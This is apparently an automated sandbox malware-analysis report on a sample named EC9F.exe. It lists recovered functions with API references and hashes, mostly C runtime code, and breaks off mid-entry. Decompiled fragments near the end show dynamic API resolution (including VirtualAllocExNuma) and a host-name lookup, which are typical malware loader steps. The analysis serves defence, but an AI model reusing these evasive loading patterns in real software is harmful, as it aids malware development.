_strlen.LIBCMT ref: 00431434

Strings

jjj, xrefs: 004313D0
, xrefs: 004313F7
s3, xrefs: 004313D8
t/j, xrefs: 00431421

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __set_error_mode_strlen
String ID: jjj$t/j$s3$
API String ID: 1625444187-615831865
Opcode ID: 59f2015f64c8a6c5157c038dd3d289a5abb5aa4bedd5935441abae86ba6c6836
Instruction ID: 8a5ab5c0f03c4ac8d38858c6f9367e5578c929676ccc67b57027953c6013c17c
Opcode Fuzzy Hash: 59f2015f64c8a6c5157c038dd3d289a5abb5aa4bedd5935441abae86ba6c6836
Instruction Fuzzy Hash: 0721D774D40208FFEB24CB84D985BAE7370EB19318F20916BE906672B1D3399E51DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00434A53, Relevance: 9.1, APIs: 6, Instructions: 95windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 00434ADB

Part of subcall function 00436E30: __vsnprintf_s_l.LIBCMTD ref: 00436E52

__invoke_watson_if_oneof.LIBCMTD ref: 00434B0E
_wcscpy_s.LIBCMTD ref: 00434B50
__invoke_watson_if_error.LIBCMTD ref: 00434B59
___crtMessageBoxW.LIBCMTD ref: 00434B72
_raise.LIBCMTD ref: 00434B8B

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s__vsnprintf_s_l_raise_wcscpy_s
String ID:
API String ID: 4254616306-0
Opcode ID: 5bb68f59371613f154bf808692ecfff4eb67b997468db6f1baebcbcf3834fa51
Instruction ID: f976c9bd2c4191d7ed58926996577702be88888b2da91e0945af2f73a59d7969
Opcode Fuzzy Hash: 5bb68f59371613f154bf808692ecfff4eb67b997468db6f1baebcbcf3834fa51
Instruction Fuzzy Hash: 87317675F40214BBDB24EB95DC46FDAB375AB4C704F0080AAF20D762C5D6B87A808F99

Uniqueness

Uniqueness Score: -1.00%

Function 0043CF84, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0043CFF8
__aullrem.LIBCMT ref: 0043D1C5
__aulldiv.LIBCMT ref: 0043D1E7

Strings

0, xrefs: 0043CFB3
9, xrefs: 0043D1F8

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: d60ba8b7cc28d6215889c596725926b66c55c0df088e40932acce54b869b4ee6
Instruction ID: a169c9c0059af94996a077dd4c958f304fd4f6686b13b343f4fe73cfaf901862
Opcode Fuzzy Hash: d60ba8b7cc28d6215889c596725926b66c55c0df088e40932acce54b869b4ee6
Instruction Fuzzy Hash: F741E2B1D05229DFDF24CF98DC89BAEB7B5FB48304F24919AE409A7240C7389A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AD91
__aullrem.LIBCMT ref: 0042AF61
__aulldiv.LIBCMT ref: 0042AF83

Strings

9, xrefs: 0042AF94
', xrefs: 0042AD2A

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: 306e89b7b2da66c17714b45fda87a8e7191b39f0c93d43a48de9b4874a35787a
Instruction ID: 9a77229bde6b69c66853860460d2c48f53c32429bc45046737979d96ff803d6c
Opcode Fuzzy Hash: 306e89b7b2da66c17714b45fda87a8e7191b39f0c93d43a48de9b4874a35787a
Instruction Fuzzy Hash: F94135B1E50129DFDB24CF48E981BAEB7B5FF85314F40409AE648AB241D3385E91CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0042BEB9, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042BF20
__aullrem.LIBCMT ref: 0042C0F0
__aulldiv.LIBCMT ref: 0042C112

Strings

9, xrefs: 0042C123
', xrefs: 0042BEB9

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: 306e89b7b2da66c17714b45fda87a8e7191b39f0c93d43a48de9b4874a35787a
Instruction ID: e388e6676921d162dbd2d1bb8be74de073d465acfb0c8b88bdb5f01d06445442
Opcode Fuzzy Hash: 306e89b7b2da66c17714b45fda87a8e7191b39f0c93d43a48de9b4874a35787a
Instruction Fuzzy Hash: 894116B1E10129DFDB24CF88D981BAEB7B5FF85314F40419AE249A7241C3385E85CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0043EF33, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EF80
__invalid_parameter.LIBCMTD ref: 0043F00D

Strings

_wcstombs_s_l, xrefs: 0043F003
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0043EFD1, 0043EFFE
bufferSize <= INT_MAX, xrefs: 0043EFC5, 0043F008

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __invalid_parameter_memset
String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
API String ID: 3961059608-322421350
Opcode ID: 51c90df4d0b8674ec02addc1503dd8a7780dbe8482b2f13ba8730c5129d874c3
Instruction ID: a0357ad04e8e6c55894bd9b7a4213b9ceae635ff8b5e815f74866a2a30b2233b
Opcode Fuzzy Hash: 51c90df4d0b8674ec02addc1503dd8a7780dbe8482b2f13ba8730c5129d874c3
Instruction Fuzzy Hash: EC21BD70A01249EBDF24DF48DC41BAE77B1BB48318F20062AF8246A3C1D3B9AD51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD17, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AD91
__aullrem.LIBCMT ref: 0042AF61
__aulldiv.LIBCMT ref: 0042AF83

Strings

9, xrefs: 0042AF94

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 756c56aaf429e6939e5938c5826f23fa21ca605c04200b77554db0f331620d7d
Instruction ID: 323333c560474969a9dde8a6ccce78d16e5640eaa759866be20c99d924b387ac
Opcode Fuzzy Hash: 756c56aaf429e6939e5938c5826f23fa21ca605c04200b77554db0f331620d7d
Instruction Fuzzy Hash: 6A4147B1E50129DFDB24CF48E981BAEB7B5FF85314F40409AE648AB241C3385E95CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0042BEA6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042BF20
__aullrem.LIBCMT ref: 0042C0F0
__aulldiv.LIBCMT ref: 0042C112

Strings

9, xrefs: 0042C123

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 756c56aaf429e6939e5938c5826f23fa21ca605c04200b77554db0f331620d7d
Instruction ID: dcd444d96e5002ef4ce124125922dabaa8bd39108ab83f2cfbabfa820e829b64
Opcode Fuzzy Hash: 756c56aaf429e6939e5938c5826f23fa21ca605c04200b77554db0f331620d7d
Instruction Fuzzy Hash: F54127B0E10129DFDB24CF88D881BAEB7B4FF85314F40419AE249A7241C3385E85CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD65, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AD91
__aullrem.LIBCMT ref: 0042AF61
__aulldiv.LIBCMT ref: 0042AF83

Strings

9, xrefs: 0042AF94

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: bee52a0bd083e9bc6fe97cfcb2b6e6292e317db12782c876446b29ff2ebd5955
Instruction ID: b820b80d32eca16881bfb5f23332d830fdbca235616d7c39373246384bc50610
Opcode Fuzzy Hash: bee52a0bd083e9bc6fe97cfcb2b6e6292e317db12782c876446b29ff2ebd5955
Instruction Fuzzy Hash: 664125B1E501299FDB24CF48DD81BAEB7B5FF85314F40419AE648AB241C7385E91CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0042BEF4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042BF20
__aullrem.LIBCMT ref: 0042C0F0
__aulldiv.LIBCMT ref: 0042C112

Strings

9, xrefs: 0042C123

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: bee52a0bd083e9bc6fe97cfcb2b6e6292e317db12782c876446b29ff2ebd5955
Instruction ID: 85df21a26e183048b5920a2902a14038bc989046deada2c48957281ccb6816f6
Opcode Fuzzy Hash: bee52a0bd083e9bc6fe97cfcb2b6e6292e317db12782c876446b29ff2ebd5955
Instruction Fuzzy Hash: C741F4B1A10529DFDB24CF88DD81BAEB7B5FF85314F40419AE249A7241C7385E85CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0043CFCC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0043CFF8
__aullrem.LIBCMT ref: 0043D1C5
__aulldiv.LIBCMT ref: 0043D1E7

Strings

9, xrefs: 0043D1F8

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 4602320b2b10fef33d173d86231321ec4dc30d3471c26b4068e238b8e0ee86c7
Instruction ID: 9c2d41a62ec7d395be17c5fb9c40569e66967507eec4dfd598683656f0d90ccb
Opcode Fuzzy Hash: 4602320b2b10fef33d173d86231321ec4dc30d3471c26b4068e238b8e0ee86c7
Instruction Fuzzy Hash: 0441C1B1D05629DFEF64CF98DC89BAEB7B5FB48304F10959AE019A7240C7389A81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD0E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AD91
_get_int64_arg.LIBCMTD ref: 0042ADB9
__aullrem.LIBCMT ref: 0042AF61
__aulldiv.LIBCMT ref: 0042AF83

Strings

9, xrefs: 0042AF94

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 99c7759a3a7344c65522e970f988fe22a187a2ee2d3a7dbc1c2808dc659612a8
Instruction ID: 632a2296649fa586c140e0a4c9cfa34e94b5e91d3d1e49d66cfb6db3adf69d09
Opcode Fuzzy Hash: 99c7759a3a7344c65522e970f988fe22a187a2ee2d3a7dbc1c2808dc659612a8
Instruction Fuzzy Hash: AE4134B1E40129DFDB24CF48E981BAEB7B5FB85314F4040DAE648A7201C3385E91CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE9D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042BF20
_get_int64_arg.LIBCMTD ref: 0042BF48
__aullrem.LIBCMT ref: 0042C0F0
__aulldiv.LIBCMT ref: 0042C112

Strings

9, xrefs: 0042C123

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 99c7759a3a7344c65522e970f988fe22a187a2ee2d3a7dbc1c2808dc659612a8
Instruction ID: 701fcb4708df9d6c7f3e84f8745f3ae27057e8d3f26f1e06339554d4cf7e82ad
Opcode Fuzzy Hash: 99c7759a3a7344c65522e970f988fe22a187a2ee2d3a7dbc1c2808dc659612a8
Instruction Fuzzy Hash: BE41F4B1A10129DFDB24CF88D981BAEB7B5FF85314F50419AE249A7201C7385E85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043CF7B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0043CFF8
_get_int64_arg.LIBCMTD ref: 0043D020
__aullrem.LIBCMT ref: 0043D1C5
__aulldiv.LIBCMT ref: 0043D1E7

Strings

9, xrefs: 0043D1F8

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: e71fad07551fe97445816274755553b0e46363e736280db784c5db9cb4ade78d
Instruction ID: c66e8b3e918375886cfdc95ac91cd4dee2bf205cfefd83de3ccd37bf4ec890a6
Opcode Fuzzy Hash: e71fad07551fe97445816274755553b0e46363e736280db784c5db9cb4ade78d
Instruction Fuzzy Hash: C141B0B1E05629DFDF64DF58DC89BAEB7B5BB48304F20959AE009A7240C7389A81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9C6, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__invalid_parameter.LIBCMTD ref: 0043EA27

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0043E9EE, 0043EA18
_wcstombs_l_helper, xrefs: 0043EA1D
pwcs != NULL, xrefs: 0043E9E5, 0043EA22

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __invalid_parameter
String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
API String ID: 3730194576-2632876063
Opcode ID: e7d9262e9efa2bdd0f71a3b467dfbda882b36f957f009c4ac88fa3c6b9b06c32
Instruction ID: 26772ab7a67b98479d1f334880ccf3fe4c15837594e72ef76a695bf39450673d
Opcode Fuzzy Hash: e7d9262e9efa2bdd0f71a3b467dfbda882b36f957f009c4ac88fa3c6b9b06c32
Instruction Fuzzy Hash: 52F0AF30B80218AADB206A61EC07F5F72617B18729F60162BB416351C2C7FE6AA4865E

Uniqueness

Uniqueness Score: -1.00%

Function 0043EEA5, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__invalid_parameter.LIBCMTD ref: 0043EF1B

Strings

_wcstombs_s_l, xrefs: 0043EF11
(dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0), xrefs: 0043EED3, 0043EF16
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0043EEDF, 0043EF0C

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __invalid_parameter
String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
API String ID: 3730194576-625432840
Opcode ID: 2f1010dbe40109fd78364fa54a142c686d6e8079e174eadf1ee8cae0a7c63fe6
Instruction ID: 12c17949876b9aee5e4fd9642796655b05c5f699e1d8bf71b9808992aafe1a4f
Opcode Fuzzy Hash: 2f1010dbe40109fd78364fa54a142c686d6e8079e174eadf1ee8cae0a7c63fe6
Instruction Fuzzy Hash: B4018670E413199AEF206E42EC07BAB7270BB1471AF11182BE414352C2D3FD5E94CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D314, Relevance: 6.0, APIs: 4, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 0041D332

Part of subcall function 00420230: new.LIBCPMTD ref: 00420245

std::exception::exception.LIBCMTD ref: 0041D356
__CxxThrowException@8.LIBCMTD ref: 0041D36B
std::ios_base::_Ios_base_dtor.LIBCPMTD ref: 0041D378

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Exception@8Ios_base_dtorThrow__wcstombs_lstd::exception::exceptionstd::ios_base::_
String ID:
API String ID: 216078729-0
Opcode ID: db51481d8e0254b9247fa03381bfa6318b1afc3e80c4bd2f0fbb406ed4fdbd4f
Instruction ID: 6c90a586d5a5b9982c33abc5383c997f396f5e8ef0da64ef12e1b4411dc674b4
Opcode Fuzzy Hash: db51481d8e0254b9247fa03381bfa6318b1afc3e80c4bd2f0fbb406ed4fdbd4f
Instruction Fuzzy Hash: 95F0F6F2D0012866CB00AA65A845BCE77AC9B10354FA48257FC14A20D1CBB85654C6FE

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8E5, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041D8EA
std::_Mutex::_Mutex.LIBCPMTD ref: 0041D8FF

Part of subcall function 00420AD0: new.LIBCPMTD ref: 00420AEA

new.LIBCPMTD ref: 0041D917

Part of subcall function 00420180: __malloc_dbg.LIBCMTD ref: 0042019A
Part of subcall function 00420180: std::bad_alloc::bad_alloc.LIBCMTD ref: 004201C8
Part of subcall function 00420180: _atexit.LIBCMTD ref: 004201D2
Part of subcall function 00420180: __CxxThrowException@8.LIBCMTD ref: 004201F0

std::locale::locale.LIBCPMT ref: 0041D925

Part of subcall function 0041D277: std::locale::_Init.LIBCPMTD ref: 0041D27A
Part of subcall function 0041D277: std::locale::facet::_Incref.LIBCPMT ref: 0041D288

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Exception@8H_prologIncrefInitMutexMutex::_Throw__malloc_dbg_atexitstd::_std::bad_alloc::bad_allocstd::locale::_std::locale::facet::_std::locale::locale
String ID:
API String ID: 96588900-0
Opcode ID: 6e5aa7651f223c85440152df45ede64ff0ae8bc58a1ee3f70b9cfce84e78eb12
Instruction ID: 223aecbf5bd4f08f99c200cd9ab8f8de26fa249f2f459b9cf01718b463a8b873
Opcode Fuzzy Hash: 6e5aa7651f223c85440152df45ede64ff0ae8bc58a1ee3f70b9cfce84e78eb12
Instruction Fuzzy Hash: 6CF089F1F103209ADB146BB59942BBE72E49B04714F50495FB512E3682DBFC9940865D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: EC9F.exe PID: 6732 Parent PID: 3352 EC9F.exeCOMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 0040C2E0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C2E0() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				CHAR* _t5;
				intOrPtr _t6;
				struct HINSTANCE__* _t8;
				CHAR* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t16;
				struct HINSTANCE__* _t18;
				CHAR* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t26;
				CHAR* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				CHAR* _t31;
				struct HINSTANCE__* _t32;
				CHAR* _t33;
				struct HINSTANCE__* _t34;
				CHAR* _t35;
				struct HINSTANCE__* _t36;
				CHAR* _t37;
				CHAR* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				struct HINSTANCE__* _t41;
				CHAR* _t42;
				struct HINSTANCE__* _t43;
				CHAR* _t44;
				struct HINSTANCE__* _t45;
				CHAR* _t46;
				struct HINSTANCE__* _t47;

				if( *0x41aa64 != 0) {
					_t6 =  *0x41a1f0; // 0x2e35d48
					_t30 =  *0x41aa64; // 0x74df0000
					 *0x41aa14 = E0040C1B0(_t30, _t6);
					_t40 =  *0x41a474; // 0x2e35ad8
					_t8 =  *0x41aa64; // 0x74df0000
					 *0x41a970 = E0040C1B0(_t8, _t40);
					_t31 =  *0x41a718; // 0x2e35e38
					_t41 =  *0x41aa64; // 0x74df0000
					 *0x41aa8c = GetProcAddress(_t41, _t31);
					_t11 =  *0x41a33c; // 0x2e32460
					_t32 =  *0x41aa64; // 0x74df0000
					 *0x41a88c = GetProcAddress(_t32, _t11);
					_t42 =  *0x41a5bc; // 0x2e331a8
					_t13 =  *0x41aa64; // 0x74df0000
					 *0x41aa68 = GetProcAddress(_t13, _t42);
					_t33 =  *0x41a4b0; // 0x2e35e50
					_t43 =  *0x41aa64; // 0x74df0000
					 *0x41a9cc = GetProcAddress(_t43, _t33);
					_t16 =  *0x41a4c8; // 0x2e35e68
					_t34 =  *0x41aa64; // 0x74df0000
					 *0x41a9e4 = GetProcAddress(_t34, _t16);
					_t44 =  *0x41a7d4; // 0x2e35d60
					_t18 =  *0x41aa64; // 0x74df0000
					 *0x41a984 = GetProcAddress(_t18, _t44);
					_t35 =  *0x41a324; // 0x2e35e20
					_t45 =  *0x41aa64; // 0x74df0000
					 *0x41aa04 = GetProcAddress(_t45, _t35);
					_t21 =  *0x41a6f0; // 0x2e35e80
					_t36 =  *0x41aa64; // 0x74df0000
					 *0x41aa78 = GetProcAddress(_t36, _t21);
					_t46 =  *0x41a7b0; // 0x2e33308
					_t23 =  *0x41aa64; // 0x74df0000
					 *0x41a9f4 = GetProcAddress(_t23, _t46);
					_t37 =  *0x41a218; // 0x2e330a8
					_t47 =  *0x41aa64; // 0x74df0000
					 *0x41aaa0 = GetProcAddress(_t47, _t37);
					_t26 =  *0x41aa64; // 0x74df0000
					 *0x41aa50 = GetProcAddress(_t26, "VirtualAllocExNuma");
				}
				_t28 =  *0x41a0f8; // 0x2e35c40
				_t1 = LoadLibraryA(_t28); // executed
				 *0x41a854 = _t1;
				_t38 =  *0x41a658; // 0x2e35c58
				_t2 = LoadLibraryA(_t38); // executed
				 *0x41a934 = _t2;
				if( *0x41a854 != 0) {
					_t5 =  *0x41a594; // 0x2e35dd8
					_t29 =  *0x41a854; // 0x74b40000
					_t2 = GetProcAddress(_t29, _t5);
					 *0x41a944 = _t2;
				}
				if( *0x41a934 != 0) {
					_t39 =  *0x41a0b8; // 0x2e33028
					_t3 =  *0x41a934; // 0x749a0000
					_t4 = GetProcAddress(_t3, _t39);
					 *0x41a9e0 = _t4;
					return _t4;
				}
				return _t2;
			}

0x0040c2ea
0x0040c2f0
0x0040c2f6
0x0040c305
0x0040c30a
0x0040c311
0x0040c31f
0x0040c324
0x0040c32b
0x0040c338
0x0040c33d
0x0040c343
0x0040c350
0x0040c355
0x0040c35c
0x0040c368
0x0040c36d
0x0040c374
0x0040c381
0x0040c386
0x0040c38c
0x0040c399
0x0040c39e
0x0040c3a5
0x0040c3b1
0x0040c3b6
0x0040c3bd
0x0040c3ca
0x0040c3cf
0x0040c3d5
0x0040c3e2
0x0040c3e7
0x0040c3ee
0x0040c3fa
0x0040c3ff
0x0040c406
0x0040c413
0x0040c41d
0x0040c429
0x0040c429
0x0040c42e
0x0040c435
0x0040c43b
0x0040c440
0x0040c447
0x0040c44d
0x0040c459
0x0040c45b
0x0040c461
0x0040c468
0x0040c46e
0x0040c46e
0x0040c47a
0x0040c47c
0x0040c483
0x0040c489
0x0040c48f
0x00000000
0x0040c48f
0x0040c495

APIs

GetProcAddress.KERNEL32(74DF0000,02E35E38), ref: 0040C332
GetProcAddress.KERNEL32(74DF0000,02E32460), ref: 0040C34A
GetProcAddress.KERNEL32(74DF0000,02E331A8), ref: 0040C362
GetProcAddress.KERNEL32(74DF0000,02E35E50), ref: 0040C37B
GetProcAddress.KERNEL32(74DF0000,02E35E68), ref: 0040C393
GetProcAddress.KERNEL32(74DF0000,02E35D60), ref: 0040C3AB
GetProcAddress.KERNEL32(74DF0000,02E35E20), ref: 0040C3C4
GetProcAddress.KERNEL32(74DF0000,02E35E80), ref: 0040C3DC
GetProcAddress.KERNEL32(74DF0000,02E33308), ref: 0040C3F4
GetProcAddress.KERNEL32(74DF0000,02E330A8), ref: 0040C40D
GetProcAddress.KERNEL32(74DF0000,VirtualAllocExNuma), ref: 0040C423
LoadLibraryA.KERNELBASE(02E35C40,?,00406B72), ref: 0040C435
LoadLibraryA.KERNELBASE(02E35C58,?,00406B72), ref: 0040C447
GetProcAddress.KERNEL32(74B40000,02E35DD8), ref: 0040C468
GetProcAddress.KERNEL32(749A0000,02E33028), ref: 0040C489

Strings

VirtualAllocExNuma, xrefs: 0040C418

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: VirtualAllocExNuma
API String ID: 2238633743-737288162
Opcode ID: 2656e5721d2e72d8ddd254abdf4fc75b759c6e6593f162f059aa174bfdec3ac2
Instruction ID: a0d7b009b4cf0954f7e46bb6ba0f8cea1e563656be094aab1f3a6ea2fda818d0
Opcode Fuzzy Hash: 2656e5721d2e72d8ddd254abdf4fc75b759c6e6593f162f059aa174bfdec3ac2
Instruction Fuzzy Hash: A44165F5523200DFC344DFA8EE8899637B9BB8C251705CA39E50983672D7389561CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC50, Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040AC50() {
				void* _v8;
				long _v12;
				int _t9;

				_v8 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v12 = 0x104;
				_t9 = GetComputerNameA(_v8,  &_v12); // executed
				if(_t9 != 0) {
					return _v8;
				}
				return 0x4191a0;
			}

0x0040ac6a
0x0040ac6d
0x0040ac7c
0x0040ac84
0x00000000
0x0040ac8f
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00406B8D), ref: 0040AC5D
RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040AC64
GetComputerNameA.KERNEL32(00406B8D,00000104), ref: 0040AC7C

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

